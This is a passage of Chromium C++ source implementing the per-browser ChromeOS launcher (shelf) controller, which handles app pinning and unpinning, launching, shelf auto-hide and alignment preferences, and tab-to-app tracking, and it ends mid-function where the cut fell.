// Replaces the controller for item |id|, notifying the old controller that it
// was removed. Ownership semantics follow the map: the map entry is the owner.
void ChromeLauncherControllerPerBrowser::SetItemController(
    ash::LauncherID id,
    LauncherItemController* controller) {
  IDToItemControllerMap::iterator iter = id_to_item_controller_map_.find(id);
  DCHECK(iter != id_to_item_controller_map_.end());
  iter->second->OnRemoved();
  iter->second = controller;
  controller->set_launcher_id(id);
}

// Closes item |id|. Pinned items are kept in the shelf as closed shortcuts
// (a fresh AppShortcutLauncherItemController is swapped in); unpinned items
// are removed entirely.
void ChromeLauncherControllerPerBrowser::CloseLauncherItem(
    ash::LauncherID id) {
  if (IsPinned(id)) {
    // Create a new shortcut controller.
    IDToItemControllerMap::iterator iter = id_to_item_controller_map_.find(id);
    DCHECK(iter != id_to_item_controller_map_.end());
    SetItemStatus(id, ash::STATUS_CLOSED);
    std::string app_id = iter->second->app_id();
    iter->second->OnRemoved();
    iter->second = new AppShortcutLauncherItemController(app_id, this);
    iter->second->set_launcher_id(id);
  } else {
    LauncherItemClosed(id);
  }
}
// Unpins item |id|: a running app reverts to a plain platform-app item; a
// closed shortcut is removed from the shelf. Persists the new pin state when
// the pinned-apps pref is user-editable.
void ChromeLauncherControllerPerBrowser::Unpin(ash::LauncherID id) {
  DCHECK(HasItemController(id));

  LauncherItemController* controller = id_to_item_controller_map_[id];
  if (controller->type() == LauncherItemController::TYPE_APP) {
    int index = model_->ItemIndexByID(id);
    ash::LauncherItem item = model_->items()[index];
    item.type = ash::TYPE_PLATFORM_APP;
    model_->Set(index, item);
  } else {
    LauncherItemClosed(id);
  }
  if (CanPin())
    PersistPinnedState();
}

// Pins the platform-app item |id| by converting it to an app shortcut.
// No-op for items that are not TYPE_PLATFORM_APP.
void ChromeLauncherControllerPerBrowser::Pin(ash::LauncherID id) {
  DCHECK(HasItemController(id));

  int index = model_->ItemIndexByID(id);
  ash::LauncherItem item = model_->items()[index];

  if (item.type != ash::TYPE_PLATFORM_APP)
    return;

  item.type = ash::TYPE_APP_SHORTCUT;
  model_->Set(index, item);

  if (CanPin())
    PersistPinnedState();
}
// Returns true if the item with |id| is pinned to the shelf, i.e. it is an
// app shortcut. Returns false when |id| is not present in the model; the
// previous code indexed items() with the -1 returned by ItemIndexByID() on a
// miss, which is out-of-bounds (sibling accessors such as IsPinnable() and
// SetLauncherItemImage() already guard against this).
bool ChromeLauncherControllerPerBrowser::IsPinned(ash::LauncherID id) {
  int index = model_->ItemIndexByID(id);
  if (index < 0)
    return false;
  return model_->items()[index].type == ash::TYPE_APP_SHORTCUT;
}
// Flips the pin state of item |id|; tolerates ids that vanished while a
// context menu was open.
void ChromeLauncherControllerPerBrowser::TogglePinned(ash::LauncherID id) {
  if (!HasItemController(id))
    return;  // May happen if item closed with menu open.

  if (IsPinned(id))
    Unpin(id);
  else
    Pin(id);
}

// An item can be (un)pinned when it is an app shortcut or a platform app and
// the pinned-apps pref is user-modifiable.
bool ChromeLauncherControllerPerBrowser::IsPinnable(ash::LauncherID id) const {
  int index = model_->ItemIndexByID(id);
  if (index == -1)
    return false;

  ash::LauncherItemType type = model_->items()[index].type;
  return ((type == ash::TYPE_APP_SHORTCUT || type == ash::TYPE_PLATFORM_APP) &&
          CanPin());
}

// V1 app locking is not supported by the per-browser controller.
void ChromeLauncherControllerPerBrowser::LockV1AppWithID(
    const std::string& app_id) {
}

// V1 app unlocking is not supported by the per-browser controller.
void ChromeLauncherControllerPerBrowser::UnlockV1AppWithID(
    const std::string& app_id) {
}
// Delegates a launch request to item |id|'s controller; tolerates stale ids.
void ChromeLauncherControllerPerBrowser::Launch(
    ash::LauncherID id, int event_flags) {
  if (!HasItemController(id))
    return;  // In case invoked from menu and item closed while menu up.
  id_to_item_controller_map_[id]->Launch(event_flags);
}

// Delegates a close request to item |id|'s controller; tolerates stale ids.
void ChromeLauncherControllerPerBrowser::Close(ash::LauncherID id) {
  if (!HasItemController(id))
    return;  // May happen if menu closed.
  id_to_item_controller_map_[id]->Close();
}

// Returns whether the item's controller reports an open window/tab.
bool ChromeLauncherControllerPerBrowser::IsOpen(ash::LauncherID id) {
  if (!HasItemController(id))
    return false;
  return id_to_item_controller_map_[id]->IsOpen();
}

// Returns whether the app backing item |id| is a (v2) platform app.
// DCHECKs that the extension is still installed.
bool ChromeLauncherControllerPerBrowser::IsPlatformApp(ash::LauncherID id) {
  if (!HasItemController(id))
    return false;

  std::string app_id = GetAppIDForLauncherID(id);
  const Extension* extension = GetExtensionForAppID(app_id);
  DCHECK(extension);
  return extension->is_platform_app();
}
// Launches the app |app_id|. If the extension is disabled, starts (at most
// one) enable flow instead and launches from its completion callback.
void ChromeLauncherControllerPerBrowser::LaunchApp(const std::string& app_id,
                                                   int event_flags) {
  // |extension| could be NULL when it is being unloaded for updating.
  const Extension* extension = GetExtensionForAppID(app_id);
  if (!extension)
    return;

  const ExtensionService* service =
      extensions::ExtensionSystem::Get(profile_)->extension_service();
  if (!service->IsExtensionEnabledForLauncher(app_id)) {
    // Do nothing if there is already a running enable flow.
    if (extension_enable_flow_)
      return;

    extension_enable_flow_.reset(
        new ExtensionEnableFlow(profile_, app_id, this));
    extension_enable_flow_->StartForNativeWindow(NULL);
    return;
  }

  chrome::OpenApplication(chrome::AppLaunchParams(GetProfileForNewWindows(),
                                                  extension,
                                                  event_flags));
}
// Activates |app_id|: focuses an existing window/tab when one matches the
// app's refocus URL pattern, otherwise launches the app. The Chrome app id is
// special-cased to the browser shortcut behavior.
void ChromeLauncherControllerPerBrowser::ActivateApp(const std::string& app_id,
                                                     int event_flags) {
  if (app_id == extension_misc::kChromeAppId) {
    OnBrowserShortcutClicked(event_flags);
    return;
  }

  // If there is an existing non-shortcut controller for this app, open it.
  ash::LauncherID id = GetLauncherIDForAppID(app_id);
  URLPattern refocus_pattern(URLPattern::SCHEME_ALL);
  refocus_pattern.SetMatchAllURLs(true);

  if (id > 0) {
    LauncherItemController* controller = id_to_item_controller_map_[id];
    if (controller->type() != LauncherItemController::TYPE_SHORTCUT) {
      controller->Activate();
      return;
    }

    // A shortcut controller may narrow which URLs count as "this app".
    AppShortcutLauncherItemController* app_controller =
        static_cast<AppShortcutLauncherItemController*>(controller);
    const GURL refocus_url = app_controller->refocus_url();

    if (!refocus_url.is_empty())
      refocus_pattern.Parse(refocus_url.spec());
  }

  // Check if there are any open tabs for this app.
  AppIDToWebContentsListMap::iterator app_i =
      app_id_to_web_contents_list_.find(app_id);
  if (app_i != app_id_to_web_contents_list_.end()) {
    for (WebContentsList::iterator tab_i = app_i->second.begin();
         tab_i != app_i->second.end();
         ++tab_i) {
      WebContents* tab = *tab_i;
      const GURL tab_url = tab->GetURL();
      if (refocus_pattern.MatchesURL(tab_url)) {
        // Refocus the first matching tab and bring its browser forward.
        Browser* browser = chrome::FindBrowserWithWebContents(tab);
        TabStripModel* tab_strip = browser->tab_strip_model();
        int index = tab_strip->GetIndexOfWebContents(tab);
        DCHECK_NE(TabStripModel::kNoTab, index);
        tab_strip->ActivateTabAt(index, false);
        browser->window()->Show();
        ash::wm::ActivateWindow(browser->window()->GetNativeWindow());
        return;
      }
    }
  }

  LaunchApp(app_id, event_flags);
}
// Returns the launch type (window/tab/...) stored in extension prefs for the
// app backing item |id|, defaulting to LAUNCH_DEFAULT.
extensions::ExtensionPrefs::LaunchType
    ChromeLauncherControllerPerBrowser::GetLaunchType(ash::LauncherID id) {
  DCHECK(HasItemController(id));

  const Extension* extension = GetExtensionForAppID(
      id_to_item_controller_map_[id]->app_id());
  return profile_->GetExtensionService()->extension_prefs()->GetLaunchType(
      extension,
      extensions::ExtensionPrefs::LAUNCH_DEFAULT);
}

// Returns the app id associated with |tab|, or an empty string.
std::string ChromeLauncherControllerPerBrowser::GetAppID(
    content::WebContents* tab) {
  return app_tab_helper_->GetAppID(tab);
}

// Returns the launcher id currently representing |app_id|, skipping panels;
// 0 when the app has no launcher item.
ash::LauncherID ChromeLauncherControllerPerBrowser::GetLauncherIDForAppID(
    const std::string& app_id) {
  for (IDToItemControllerMap::const_iterator i =
           id_to_item_controller_map_.begin();
       i != id_to_item_controller_map_.end(); ++i) {
    if (i->second->type() == LauncherItemController::TYPE_APP_PANEL)
      continue;  // Don't include panels
    if (i->second->app_id() == app_id)
      return i->first;
  }
  return 0;
}

// Inverse of GetLauncherIDForAppID; |id| must exist.
std::string ChromeLauncherControllerPerBrowser::GetAppIDForLauncherID(
    ash::LauncherID id) {
  DCHECK(HasItemController(id));
  return id_to_item_controller_map_[id]->app_id();
}
// Applies |image| to every launcher item whose controller reports app |id|.
void ChromeLauncherControllerPerBrowser::SetAppImage(
    const std::string& id,
    const gfx::ImageSkia& image) {
  // TODO: need to get this working for shortcuts.
  for (IDToItemControllerMap::const_iterator i =
           id_to_item_controller_map_.begin();
       i != id_to_item_controller_map_.end(); ++i) {
    if (i->second->app_id() != id)
      continue;

    int index = model_->ItemIndexByID(i->first);
    ash::LauncherItem item = model_->items()[index];
    item.image = image;
    model_->Set(index, item);
    // It's possible we're waiting on more than one item, so don't break.
  }
}
// Persists |new_behavior| as the shelf auto-hide preference for every root
// window the launcher is shown on (all displays when the per-display launcher
// is enabled, otherwise only the primary display).
// (Removed the unused local `std::string behavior_string;` the original
// declared and never read.)
void ChromeLauncherControllerPerBrowser::OnAutoHideBehaviorChanged(
    ash::ShelfAutoHideBehavior new_behavior) {
  ash::Shell::RootWindowList root_windows;
  if (ash::Shell::IsLauncherPerDisplayEnabled())
    root_windows = ash::Shell::GetAllRootWindows();
  else
    root_windows.push_back(ash::Shell::GetPrimaryRootWindow());

  for (ash::Shell::RootWindowList::const_iterator iter =
           root_windows.begin();
       iter != root_windows.end(); ++iter) {
    SetShelfAutoHideBehaviorPrefs(new_behavior, *iter);
  }
}
// Sets the icon of a single launcher item; silently ignores unknown ids.
void ChromeLauncherControllerPerBrowser::SetLauncherItemImage(
    ash::LauncherID launcher_id,
    const gfx::ImageSkia& image) {
  int index = model_->ItemIndexByID(launcher_id);
  if (index == -1)
    return;
  ash::LauncherItem item = model_->items()[index];
  item.image = image;
  model_->Set(index, item);
}

// True if any pinned launcher item belongs to |app_id|.
bool ChromeLauncherControllerPerBrowser::IsAppPinned(
    const std::string& app_id) {
  for (IDToItemControllerMap::const_iterator i =
           id_to_item_controller_map_.begin();
       i != id_to_item_controller_map_.end(); ++i) {
    if (IsPinned(i->first) && i->second->app_id() == app_id)
      return true;
  }
  return false;
}
// Public pin entry point; it is a programming error to call this when the
// pinned-apps pref is not user-editable.
void ChromeLauncherControllerPerBrowser::PinAppWithID(
    const std::string& app_id) {
  if (CanPin())
    DoPinAppWithID(app_id);
  else
    NOTREACHED();
}
// Stores |launch_type| in extension prefs for the app backing item |id|.
// No-op for unknown ids. (Dropped the original `return <void expr>;` — the
// function is void, so the plain call is the idiomatic form used elsewhere in
// this file.)
void ChromeLauncherControllerPerBrowser::SetLaunchType(
    ash::LauncherID id,
    extensions::ExtensionPrefs::LaunchType launch_type) {
  if (!HasItemController(id))
    return;

  profile_->GetExtensionService()->extension_prefs()->SetLaunchType(
      id_to_item_controller_map_[id]->app_id(), launch_type);
}
// Public unpin entry point; it is a programming error to call this when the
// pinned-apps pref is not user-editable.
void ChromeLauncherControllerPerBrowser::UnpinAppsWithID(
    const std::string& app_id) {
  if (CanPin())
    DoUnpinAppsWithID(app_id);
  else
    NOTREACHED();
}

// True when the effective profile is an incognito (guest) profile.
bool ChromeLauncherControllerPerBrowser::IsLoggedInAsGuest() {
  return ProfileManager::GetDefaultProfileOrOffTheRecord()->IsOffTheRecord();
}
// Opens a new browser window on the ash desktop for the current profile.
void ChromeLauncherControllerPerBrowser::CreateNewWindow() {
  chrome::NewEmptyWindow(
      GetProfileForNewWindows(), chrome::HOST_DESKTOP_TYPE_ASH);
}

// Opens a new incognito browser window on the ash desktop.
void ChromeLauncherControllerPerBrowser::CreateNewIncognitoWindow() {
  chrome::NewEmptyWindow(GetProfileForNewWindows()->GetOffTheRecordProfile(),
                         chrome::HOST_DESKTOP_TYPE_ASH);
}

// Pinning is allowed only while the pinned-apps pref exists and is
// user-modifiable (i.e. not locked down by policy).
bool ChromeLauncherControllerPerBrowser::CanPin() const {
  const PrefService::Preference* pref =
      profile_->GetPrefs()->FindPreference(prefs::kPinnedLauncherApps);
  return pref && pref->IsUserModifiable();
}
// Resolves the effective auto-hide behavior for |root_window|'s display from
// prefs/policy; app (kiosk) mode always hides the shelf.
ash::ShelfAutoHideBehavior
    ChromeLauncherControllerPerBrowser::GetShelfAutoHideBehavior(
        aura::RootWindow* root_window) const {
  // Don't show the shelf in the app mode.
  if (chrome::IsRunningInAppMode())
    return ash::SHELF_AUTO_HIDE_ALWAYS_HIDDEN;

  // See comment in |kShelfAlignment| as to why we consider two prefs.
  const std::string behavior_value(
      GetPrefForRootWindow(profile_->GetPrefs(),
                           root_window,
                           prefs::kShelfAutoHideBehaviorLocal,
                           prefs::kShelfAutoHideBehavior));

  // Note: To maintain sync compatibility with old images of chrome/chromeos
  // the set of values that may be encountered includes the now-extinct
  // "Default" as well as "Never" and "Always", "Default" should now
  // be treated as "Never" (http://crbug.com/146773).
  if (behavior_value == ash::kShelfAutoHideBehaviorAlways)
    return ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS;
  return ash::SHELF_AUTO_HIDE_BEHAVIOR_NEVER;
}

// Whether the user (as opposed to policy) may change the auto-hide behavior.
bool ChromeLauncherControllerPerBrowser::CanUserModifyShelfAutoHideBehavior(
    aura::RootWindow* root_window) const {
  return profile_->GetPrefs()->
      FindPreference(prefs::kShelfAutoHideBehaviorLocal)->IsUserModifiable();
}
// Flips the auto-hide behavior (ALWAYS <-> NEVER) for |root_window|'s display
// and persists it via the pref layer. (Removed the redundant trailing
// `return;` the original had at the end of this void function.)
void ChromeLauncherControllerPerBrowser::ToggleShelfAutoHideBehavior(
    aura::RootWindow* root_window) {
  ash::ShelfAutoHideBehavior behavior = GetShelfAutoHideBehavior(root_window) ==
      ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS ?
          ash::SHELF_AUTO_HIDE_BEHAVIOR_NEVER :
          ash::SHELF_AUTO_HIDE_BEHAVIOR_ALWAYS;
  SetShelfAutoHideBehaviorPrefs(behavior, root_window);
}
// Forgets |tab| for app |app_id|; when that was the app's last tab, the app's
// tab list is dropped and its launcher item (if any) is marked closed.
void ChromeLauncherControllerPerBrowser::RemoveTabFromRunningApp(
    WebContents* tab,
    const std::string& app_id) {
  web_contents_to_app_id_.erase(tab);
  AppIDToWebContentsListMap::iterator i_app_id =
      app_id_to_web_contents_list_.find(app_id);
  if (i_app_id != app_id_to_web_contents_list_.end()) {
    WebContentsList* tab_list = &i_app_id->second;
    tab_list->remove(tab);
    if (tab_list->empty()) {
      app_id_to_web_contents_list_.erase(i_app_id);
      // |i_app_id| is invalid after erase; reset it defensively.
      i_app_id = app_id_to_web_contents_list_.end();
      ash::LauncherID id = GetLauncherIDForAppID(app_id);
      if (id > 0)
        SetItemStatus(id, ash::STATUS_CLOSED);
    }
  }
}
// Keeps the app <-> tab bookkeeping and launcher item status in sync with a
// tab state transition (|app_state|) of |contents|.
void ChromeLauncherControllerPerBrowser::UpdateAppState(
    content::WebContents* contents,
    AppState app_state) {
  std::string app_id = GetAppID(contents);

  // Check the old |app_id| for a tab. If the contents has changed we need to
  // remove it from the previous app.
  if (web_contents_to_app_id_.find(contents) != web_contents_to_app_id_.end()) {
    std::string last_app_id = web_contents_to_app_id_[contents];
    if (last_app_id != app_id)
      RemoveTabFromRunningApp(contents, last_app_id);
  }

  if (app_id.empty())
    return;

  web_contents_to_app_id_[contents] = app_id;

  if (app_state == APP_STATE_REMOVED) {
    // The tab has gone away.
    RemoveTabFromRunningApp(contents, app_id);
  } else {
    WebContentsList& tab_list(app_id_to_web_contents_list_[app_id]);

    if (app_state == APP_STATE_INACTIVE) {
      WebContentsList::const_iterator i_tab =
          std::find(tab_list.begin(), tab_list.end(), contents);
      if (i_tab == tab_list.end())
        tab_list.push_back(contents);
      if (i_tab != tab_list.begin()) {
        // Going inactive, but wasn't the front tab, indicating that a new
        // tab has already become active.
        return;
      }
    } else {
      // Active states move the tab to the front of the MRU list.
      tab_list.remove(contents);
      tab_list.push_front(contents);
    }

    ash::LauncherID id = GetLauncherIDForAppID(app_id);
    if (id > 0) {
      // If the window is active, mark the app as active.
      SetItemStatus(id, app_state == APP_STATE_WINDOW_ACTIVE ?
          ash::STATUS_ACTIVE : ash::STATUS_RUNNING);
    }
  }
}
// Test hook: overrides the refocus URL of the app-shortcut item |id|.
void ChromeLauncherControllerPerBrowser::SetRefocusURLPatternForTest(
    ash::LauncherID id,
    const GURL& url) {
  DCHECK(HasItemController(id));
  LauncherItemController* controller = id_to_item_controller_map_[id];

  int index = model_->ItemIndexByID(id);
  if (index == -1) {
    NOTREACHED() << "Invalid launcher id";
    return;
  }

  ash::LauncherItemType type = model_->items()[index].type;
  if (type == ash::TYPE_APP_SHORTCUT) {
    AppShortcutLauncherItemController* app_controller =
        static_cast<AppShortcutLauncherItemController*>(controller);
    app_controller->set_refocus_url(url);
  } else {
    NOTREACHED() << "Invalid launcher type";
  }
}

// Looks up the installed extension for |app_id|; may return NULL.
const Extension* ChromeLauncherControllerPerBrowser::GetExtensionForAppID(
    const std::string& app_id) const {
  return profile_->GetExtensionService()->GetInstalledExtension(app_id);
}
// Handles clicks on the Chrome browser shortcut: Ctrl-click always opens a
// new window, otherwise the most recent tabbed ash browser is activated
// (creating one if none exists).
void ChromeLauncherControllerPerBrowser::OnBrowserShortcutClicked(
    int event_flags) {
  if (event_flags & ui::EF_CONTROL_DOWN) {
    CreateNewWindow();
    return;
  }

  Browser* last_browser = chrome::FindTabbedBrowser(
      GetProfileForNewWindows(), true, chrome::HOST_DESKTOP_TYPE_ASH);

  if (!last_browser) {
    CreateNewWindow();
    return;
  }

  aura::Window* window = last_browser->window()->GetNativeWindow();
  window->Show();
  ash::wm::ActivateWindow(window);
}

// Forwards a launcher item click to the item's controller.
void ChromeLauncherControllerPerBrowser::ItemClicked(
    const ash::LauncherItem& item,
    const ui::Event& event) {
  DCHECK(HasItemController(item.id));
  id_to_item_controller_map_[item.id]->Clicked(event);
}

// Resource id of the icon used for the browser shortcut item.
int ChromeLauncherControllerPerBrowser::GetBrowserShortcutResourceId() {
  return IDR_PRODUCT_LOGO_32;
}
// Returns the tooltip/title supplied by |item|'s controller.
string16 ChromeLauncherControllerPerBrowser::GetTitle(
    const ash::LauncherItem& item) {
  DCHECK(HasItemController(item.id));
  return id_to_item_controller_map_[item.id]->GetTitle();
}

// Builds the context menu for |item| on |root_window|; caller takes
// ownership of the returned model.
ui::MenuModel* ChromeLauncherControllerPerBrowser::CreateContextMenu(
    const ash::LauncherItem& item,
    aura::RootWindow* root_window) {
  return new LauncherContextMenu(this, &item, root_window);
}

// Application (item list) menus are a per-app-launcher feature only.
ash::LauncherMenuModel*
ChromeLauncherControllerPerBrowser::CreateApplicationMenu(
    const ash::LauncherItem& item,
    int event_flags) {
  // Not used by this launcher type.
  return NULL;
}

// Returns the launcher id whose controller owns |window|, or 0.
ash::LauncherID ChromeLauncherControllerPerBrowser::GetIDByWindow(
    aura::Window* window) {
  for (IDToItemControllerMap::const_iterator i =
           id_to_item_controller_map_.begin();
       i != id_to_item_controller_map_.end(); ++i) {
    if (i->second->HasWindow(window))
      return i->first;
  }
  return 0;
}
// App shortcuts are draggable only when pinning is user-editable; every other
// item type can always be dragged.
bool ChromeLauncherControllerPerBrowser::IsDraggable(
    const ash::LauncherItem& item) {
  return item.type == ash::TYPE_APP_SHORTCUT ? CanPin() : true;
}

// Suppress the tooltip for app panels whose window is already visible.
bool ChromeLauncherControllerPerBrowser::ShouldShowTooltip(
    const ash::LauncherItem& item) {
  if (item.type == ash::TYPE_APP_PANEL &&
      id_to_item_controller_map_[item.id]->IsVisible())
    return false;
  return true;
}

// Tracks a newly created launcher and observes its shelf layout manager.
void ChromeLauncherControllerPerBrowser::OnLauncherCreated(
    ash::Launcher* launcher) {
  launchers_.insert(launcher);
  launcher->shelf_widget()->shelf_layout_manager()->AddObserver(this);
}

// Stops tracking a launcher that is being destroyed.
void ChromeLauncherControllerPerBrowser::OnLauncherDestroyed(
    ash::Launcher* launcher) {
  launchers_.erase(launcher);
  // RemoveObserver is not called here, since by the time this method is called
  // Launcher is already in its destructor.
}
// LauncherModelObserver: additions need no bookkeeping here.
void ChromeLauncherControllerPerBrowser::LauncherItemAdded(int index) {
}

// LauncherModelObserver: removals need no bookkeeping here.
void ChromeLauncherControllerPerBrowser::LauncherItemRemoved(
    int index,
    ash::LauncherID id) {
}

// LauncherModelObserver: persists pin order when a pinned item was dragged.
void ChromeLauncherControllerPerBrowser::LauncherItemMoved(
    int start_index,
    int target_index) {
  ash::LauncherID id = model_->items()[target_index].id;
  if (HasItemController(id) && IsPinned(id))
    PersistPinnedState();
}

// LauncherModelObserver: forwards the change to the item's controller.
void ChromeLauncherControllerPerBrowser::LauncherItemChanged(
    int index,
    const ash::LauncherItem& old_item) {
  ash::LauncherID id = model_->items()[index].id;
  id_to_item_controller_map_[id]->LauncherItemChanged(index, old_item);
}

// LauncherModelObserver: status changes need no bookkeeping here.
void ChromeLauncherControllerPerBrowser::LauncherStatusChanged() {
}
// NotificationObserver: reacts to extension (un)load by refreshing icons and
// the pinned-apps state.
void ChromeLauncherControllerPerBrowser::Observe(
    int type,
    const content::NotificationSource& source,
    const content::NotificationDetails& details) {
  switch (type) {
    case chrome::NOTIFICATION_EXTENSION_LOADED: {
      const Extension* extension =
          content::Details<const Extension>(details).ptr();
      if (IsAppPinned(extension->id())) {
        // Clear and re-fetch to ensure icon is up-to-date.
        app_icon_loader_->ClearImage(extension->id());
        app_icon_loader_->FetchImage(extension->id());
      }

      UpdateAppLaunchersFromPref();
      break;
    }
    case chrome::NOTIFICATION_EXTENSION_UNLOADED: {
      const content::Details<extensions::UnloadedExtensionInfo>& unload_info(
          details);
      const Extension* extension = unload_info->extension;
      if (IsAppPinned(extension->id())) {
        // Uninstall drops the pin entirely; other unload reasons (update,
        // disable) just refresh the cached icon.
        if (unload_info->reason == extension_misc::UNLOAD_REASON_UNINSTALL) {
          DoUnpinAppsWithID(extension->id());
          app_icon_loader_->ClearImage(extension->id());
        } else {
          app_icon_loader_->UpdateImage(extension->id());
        }
      }
      break;
    }
    default:
      NOTREACHED() << "Unexpected notification type=" << type;
  }
}
// Persists the current shelf alignment of |root_window| into the per-display
// pref, plus the two global prefs when it is the primary display.
void ChromeLauncherControllerPerBrowser::OnShelfAlignmentChanged(
    aura::RootWindow* root_window) {
  const char* pref_value = NULL;
  switch (ash::Shell::GetInstance()->GetShelfAlignment(root_window)) {
    case ash::SHELF_ALIGNMENT_BOTTOM:
      pref_value = ash::kShelfAlignmentBottom;
      break;
    case ash::SHELF_ALIGNMENT_LEFT:
      pref_value = ash::kShelfAlignmentLeft;
      break;
    case ash::SHELF_ALIGNMENT_RIGHT:
      pref_value = ash::kShelfAlignmentRight;
      break;
    case ash::SHELF_ALIGNMENT_TOP:
      pref_value = ash::kShelfAlignmentTop;
      break;
  }

  UpdatePerDisplayPref(
      profile_->GetPrefs(), root_window, prefs::kShelfAlignment, pref_value);

  if (root_window == ash::Shell::GetPrimaryRootWindow()) {
    // See comment in |kShelfAlignment| about why we have two prefs here.
    profile_->GetPrefs()->SetString(prefs::kShelfAlignmentLocal, pref_value);
    profile_->GetPrefs()->SetString(prefs::kShelfAlignment, pref_value);
  }
}
// DisplayController::Observer: nothing to do before the change applies.
void ChromeLauncherControllerPerBrowser::OnDisplayConfigurationChanging() {
}

// DisplayController::Observer: re-applies shelf prefs to the new displays.
void ChromeLauncherControllerPerBrowser::OnDisplayConfigurationChanged() {
  SetShelfBehaviorsFromPrefs();
}

// PrefServiceSyncable observer: once sync state changes, seed local shelf
// prefs from their synced counterparts if the user never set them here.
void ChromeLauncherControllerPerBrowser::OnIsSyncingChanged() {
  PrefServiceSyncable* prefs = PrefServiceSyncable::FromProfile(profile_);
  MaybePropagatePrefToLocal(prefs,
                            prefs::kShelfAlignmentLocal,
                            prefs::kShelfAlignment);
  MaybePropagatePrefToLocal(prefs,
                            prefs::kShelfAutoHideBehaviorLocal,
                            prefs::kShelfAutoHideBehavior);
}

// Mirrors the app sync status into the launcher model's loading state.
void ChromeLauncherControllerPerBrowser::OnAppSyncUIStatusChanged() {
  if (app_sync_ui_state_->status() == AppSyncUIState::STATUS_SYNCING)
    model_->SetStatus(ash::LauncherModel::STATUS_LOADING);
  else
    model_->SetStatus(ash::LauncherModel::STATUS_NORMAL);
}
// ExtensionEnableFlow delegate: the app was re-enabled, launch it now.
void ChromeLauncherControllerPerBrowser::ExtensionEnableFlowFinished() {
  LaunchApp(extension_enable_flow_->extension_id(), ui::EF_NONE);
  extension_enable_flow_.reset();
}

// ExtensionEnableFlow delegate: flow aborted, drop it without launching.
void ChromeLauncherControllerPerBrowser::ExtensionEnableFlowAborted(
    bool user_initiated) {
  extension_enable_flow_.reset();
}
// Rewrites prefs::kPinnedLauncherApps from the current model order, with the
// pref-change observer temporarily detached to avoid feedback.
void ChromeLauncherControllerPerBrowser::PersistPinnedState() {
  // It is a coding error to call PersistPinnedState() if the pinned apps are
  // not user-editable. The code should check earlier and not perform any
  // modification actions that trigger persisting the state.
  if (!CanPin()) {
    NOTREACHED() << "Can't pin but pinned state being updated";
    return;
  }
  // Mutating kPinnedLauncherApps is going to notify us and trigger us to
  // process the change. We don't want that to happen so remove ourselves as a
  // listener.
  pref_change_registrar_.Remove(prefs::kPinnedLauncherApps);
  {
    // Scoped so the ListPrefUpdate commits before the observer is re-added.
    ListPrefUpdate updater(profile_->GetPrefs(), prefs::kPinnedLauncherApps);
    updater->Clear();
    for (size_t i = 0; i < model_->items().size(); ++i) {
      if (model_->items()[i].type == ash::TYPE_APP_SHORTCUT) {
        ash::LauncherID id = model_->items()[i].id;
        if (HasItemController(id) && IsPinned(id)) {
          base::DictionaryValue* app_value = ash::CreateAppDict(
              id_to_item_controller_map_[id]->app_id());
          if (app_value)
            updater->Append(app_value);
        }
      }
    }
  }
  pref_change_registrar_.Add(
      prefs::kPinnedLauncherApps,
      base::Bind(&ChromeLauncherControllerPerBrowser::
                     UpdateAppLaunchersFromPref,
                 base::Unretained(this)));
}
// Accessor for the launcher model this controller drives.
ash::LauncherModel* ChromeLauncherControllerPerBrowser::model() {
  return model_;
}

// Accessor for the (possibly defaulted) profile backing this controller.
Profile* ChromeLauncherControllerPerBrowser::profile() {
  return profile_;
}

// Profile used when opening new windows from the launcher.
Profile* ChromeLauncherControllerPerBrowser::GetProfileForNewWindows() {
  return ProfileManager::GetDefaultProfileOrOffTheRecord();
}

// Fully removes item |id|: drops its icon, notifies and unmaps its
// controller, then deletes the model entry.
void ChromeLauncherControllerPerBrowser::LauncherItemClosed(
    ash::LauncherID id) {
  IDToItemControllerMap::iterator iter = id_to_item_controller_map_.find(id);
  DCHECK(iter != id_to_item_controller_map_.end());
  app_icon_loader_->ClearImage(iter->second->app_id());
  iter->second->OnRemoved();
  id_to_item_controller_map_.erase(iter);
  model_->RemoveItemAt(model_->ItemIndexByID(id));
}
// Pins |app_id|: converts its running item to a shortcut when one exists,
// otherwise appends a new shortcut item. Idempotent for already-pinned apps.
void ChromeLauncherControllerPerBrowser::DoPinAppWithID(
    const std::string& app_id) {
  // If there is an item, do nothing and return.
  if (IsAppPinned(app_id))
    return;

  ash::LauncherID launcher_id = GetLauncherIDForAppID(app_id);
  if (launcher_id) {
    // App item exists, pin it
    Pin(launcher_id);
  } else {
    // Otherwise, create a shortcut item for it.
    CreateAppShortcutLauncherItem(app_id, model_->item_count());
    if (CanPin())
      PersistPinnedState();
  }
}

// Unpins every pinned item belonging to |app_id|. The iterator is advanced
// before Unpin() because Unpin() may erase the current map entry.
void ChromeLauncherControllerPerBrowser::DoUnpinAppsWithID(
    const std::string& app_id) {
  for (IDToItemControllerMap::iterator i = id_to_item_controller_map_.begin();
       i != id_to_item_controller_map_.end(); ) {
    IDToItemControllerMap::iterator current(i);
    ++i;
    if (current->second->app_id() == app_id && IsPinned(current->first))
      Unpin(current->first);
  }
}
// Reconciles the shelf's app-shortcut items with the ordered list stored in
// prefs::kPinnedLauncherApps, adding, removing and reordering as needed.
void ChromeLauncherControllerPerBrowser::UpdateAppLaunchersFromPref() {
  // Construct a vector representation of to-be-pinned apps from the pref.
  std::vector<std::string> pinned_apps;
  const base::ListValue* pinned_apps_pref =
      profile_->GetPrefs()->GetList(prefs::kPinnedLauncherApps);
  for (base::ListValue::const_iterator it(pinned_apps_pref->begin());
       it != pinned_apps_pref->end(); ++it) {
    DictionaryValue* app = NULL;
    std::string app_id;
    // Entries are kept only if well-formed, not yet seen, and still valid.
    if ((*it)->GetAsDictionary(&app) &&
        app->GetString(ash::kPinnedAppsPrefAppIDPath, &app_id) &&
        std::find(pinned_apps.begin(), pinned_apps.end(), app_id) ==
            pinned_apps.end() &&
        app_tab_helper_->IsValidID(app_id)) {
      pinned_apps.push_back(app_id);
    }
  }

  // Walk the model and |pinned_apps| from the pref lockstep, adding and
  // removing items as necessary. NB: This code uses plain old indexing instead
  // of iterators because of model mutations as part of the loop.
  std::vector<std::string>::const_iterator pref_app_id(pinned_apps.begin());
  int index = 0;
  for (; index < model_->item_count() && pref_app_id != pinned_apps.end();
       ++index) {
    // If the next app launcher according to the pref is present in the model,
    // delete all app launcher entries in between.
    if (IsAppPinned(*pref_app_id)) {
      for (; index < model_->item_count(); ++index) {
        const ash::LauncherItem& item(model_->items()[index]);
        if (item.type != ash::TYPE_APP_SHORTCUT)
          continue;

        IDToItemControllerMap::const_iterator entry =
